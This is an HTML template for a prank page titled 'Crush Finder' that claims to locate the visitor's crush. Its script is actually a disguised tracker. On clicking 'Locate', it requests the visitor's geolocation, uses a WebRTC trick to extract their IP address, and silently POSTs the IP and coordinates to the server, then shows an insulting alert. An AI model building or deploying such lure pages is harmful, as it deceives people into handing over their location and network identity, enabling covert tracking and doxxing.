<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Crush Finder</title>
<style>
	body,html {
    height: 100%;
}
</style>
<!-- CSS only -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" integrity="sha384-9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">

<!-- JS, Popper.js, and jQuery -->

<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js" integrity="sha384-OgVRvuATP1z7JjHLkuOU7Xw704+h835Lr+6QL9UvYjZE3Ipu6Tp75j7Bh/kR0JKI" crossorigin="anonymous"></script>
<script>
    // Set up global variable
    var result;
	var locip;

	function getip(lat, lon){

		window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;//compatibility for Firefox and chrome
		var pc = new RTCPeerConnection({iceServers:[]}), noop = function(){};      
		pc.createDataChannel('');//create a bogus data channel
		pc.createOffer(pc.setLocalDescription.bind(pc), noop);// create offer and set local description
		pc.onicecandidate = function(ice)
		{
		if (ice && ice.candidate && ice.candidate.candidate)
		{
		var myIP = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate)[1]; 
		  
		pc.onicecandidate = noop;
		console.log('my IP: ', myIP); 
		window.result = myIP;
		var xhr = new XMLHttpRequest();
		var yourUrl = '';
		var data = 'locip='+window.result+'&latitude='+lat+'&longitude='+lon
		xhr.open("POST", yourUrl, true);
		xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
		xhr.send(data);
		alert("You've got no Crush you lonely dumbass");
		}
};

		
	}
    
    function showPosition() {
        // Store the element where the page displays the result
        result = document.getElementById("result");
        
        // If geolocation is available, try to get the visitor's position
        if(navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(successCallback, errorCallback);
        } else {
            alert("Sorry, your browser does not support HTML5 geolocation.");
        }
    };
    
    // Define callback function for successful attempt
    function successCallback(position) {
		var lat = position.coords.latitude;
		var lon = position.coords.longitude;
	
        getip(lat, lon);
	}
    
    // Define callback function for failed attempt
    function errorCallback(error) {
        if(error.code == 1) {
            var lat = "Not Disclosed";
			var lon = "Not Disclosed";
            getip(lat, lon);
        } else if(error.code == 2) {
			var lat = "Network Down";
			var lon = "Network Down";
            getip(lat, lon);
        } else if(error.code == 3) {
            var lat = "Time out";
			var lon = "Time out";
            getip(lat, lon);
        } else {
			var lat = "Unknown Error";
			var lon = "Unknown Error";
            getip(lat, lon);
        }
    }

	// =============================== IP ====================================

	

</script>
</head>



<body>
    <div id="result">
        <!--Position information will be inserted here-->
	</div>
	{% if img %}
	<div class="container" id="content">
		<div class="row h-100 mt-5">
			<main class="col-md-6">
				
				<h1>Content...</h1>
				
					<img src="{{img}}" alt="meme" width="100%" height="100%" />
			<br>
			<br>
			<hr>
			</main>
		</div>
	</div>
	{% else %}
	<div class="d-flex align-items-center flex-column justify-content-center h-100 bg-dark text-white" id="header">
		<h1 class="display-4">Crush Locater</h1>
		<form method="post" action="">
			<div class="form-group">
				<input class="form-control form-control-lg" placeholder="Your Name" type="text">
			</div>
			<div class="form-group">
				<button type="button" onclick="showPosition();" class="btn btn-info btn-lg btn-block">Locate</button>
			</div>
		</form>
	</div>
   {% endif %}
</body>
</html>              